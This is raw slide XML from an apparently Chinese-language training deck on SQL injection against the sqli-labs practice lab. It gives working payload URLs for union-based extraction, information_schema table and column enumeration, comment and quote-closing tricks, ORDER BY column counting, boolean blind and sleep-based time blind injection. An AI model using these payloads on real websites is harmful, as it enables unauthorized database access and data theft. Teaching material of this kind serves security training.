            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Select * from users where id='-1' union select 1,2,database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Select * from users where id='-1' union select 1,2,database()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/* */ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不太能用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单双引号闭合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()'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注入相关的注释（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90651" y="2420939"/>
            <a:ext cx="8724900" cy="847725"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic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789363"/>
            <a:ext cx="9372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关于数据库系统的自带库、表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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>为例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表 ：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>所有的库信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>所有的表信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>所有的列信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（其实，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>information_schema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的表实际上是视图，而不是基本表）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注入时的种种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字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>整型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>带单引号、双引号？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>带括号？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET 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POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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如何构造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查询语句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如何利用网页上的报错信息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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句 信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>near ....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如何利用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语句中注释功能？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http://localhost/sqli-labs/Less-1/?id=1' --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注释</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1%27%20--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1' %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>号注释：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1%27%20%23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</a:rPr>
              <a:t>问题： 如何让构造的</a:t>
            </a:r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</a:rPr>
              <a:t>查询语句 不报语法错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单引号闭合？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1%27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双引号闭合？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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1140057" cy="1216025"/>
          </a:xfrm>
        </p:spPr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数据库一些相关函数、变量：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1245891" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>version(),user(),database(),@@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的作用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union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>联合 查询</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1' union select 1,concat_ws('-',user(),version(),database()),@@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> %23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</a:rPr>
              <a:t>问题： 数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema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</a:rPr>
              <a:t>是什么？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information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是一个视图，但可以象数据库表一样被查询。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、与当前数据库信息结合</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>CHARACTER_SETS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>表	提供了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql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可用字符集的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>SCHEMATA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>表		当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql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实例中所有数据库的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>TABLES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>表		存储数据库中的表信息（包括视图）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>COLUMNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>表		存储表中的列信息，包括表有多少列、每个列的类型等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>STATISTICS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>表		表索引的信息。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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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初</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>识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注入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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数写法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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入内容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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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90" name="文本占位符 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注释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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>其他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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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数据库的表，表名是什么？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http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(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) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables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table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=database() %23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</a:rPr>
              <a:t>问题： 数据库的表，表中有多少条记录，多少行？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210" y="1752600"/>
            <a:ext cx="11525331" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3 %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	http://localhost/sqli-labs/Less-1/?id=2' union select 1,2,3 %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	http://localhost/sqli-labs/Less-1/?id=3' union select 1,2,3 %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	http://localhost/sqli-labs/Less-1/?id=4' union select 1,2,3 %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	http://localhost/sqli-labs/Less-1/?id=15' union select 1,2,3 %23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</a:rPr>
              <a:t>问题： 数据库的表，表中都有几个字段？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构造：	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1' order by 3 %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-1/?id=1%27%20order%20by%204%20%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM `users` WHERE id='1' order by 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	SELECT * FROM `users` WHERE id='1' order by 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	SELECT * FROM `users` WHERE id='1' order by 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	SELECT * FROM `users` WHERE id='1' order by 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	…………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数据库的表，表中字段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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.columns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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的作用。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http://localhost/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.columns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='users' --+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</a:rPr>
              <a:t>问题：  没有报错信息时，应该怎么办？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此时称为布尔盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用布尔型值 真和假时的区别。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-8/?id=1%27%20and%20database()=%27security%27%20%23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问题：  没有报错信息时，应该怎么办？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211" y="1752600"/>
            <a:ext cx="11334829" cy="4891110"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>取出数据库名称 的第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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2800" dirty="0" smtClean="0"/>
              <a:t>个字母，并取长为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，一个一个进行猜解</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-8/?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>((select database()),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zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,1))&gt;110 %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-8/?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>((select database()),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zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,1))&gt;111 %23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	http://localhost/sqli-labs/Less-8/?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>((select database()),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zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,1))&gt;115 %23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</a:rPr>
              <a:t>问题：  没有报错信息时，应该怎么办？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0579136" cy="4891110"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>取出数据库名称 的第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2400" dirty="0" smtClean="0"/>
              <a:t>个字母，并取长为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-8/?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>((select database()),</a:t>
            </a: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zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>,1))&gt;110 %23	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-8/?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>((select database()),</a:t>
            </a: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zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>,1))&gt;110 %23	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>取出数据库名称 的第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zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>个字母，并取长为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-8/?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ascii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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>((select database()),</a:t>
            </a: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zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>,1))&gt;110 %23</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pP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问题：  没有报错信息，也没有布尔型真和假的区别，应该怎么办？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6211" y="1752600"/>
            <a:ext cx="11334829" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可尝试利用时间盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数是能延时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-9/?id=1%27%20and%20sleep(5)%20%23	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	http://localhost/sqli-labs/Less-9/?id=22%27%20and%20sleep(5)%20%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
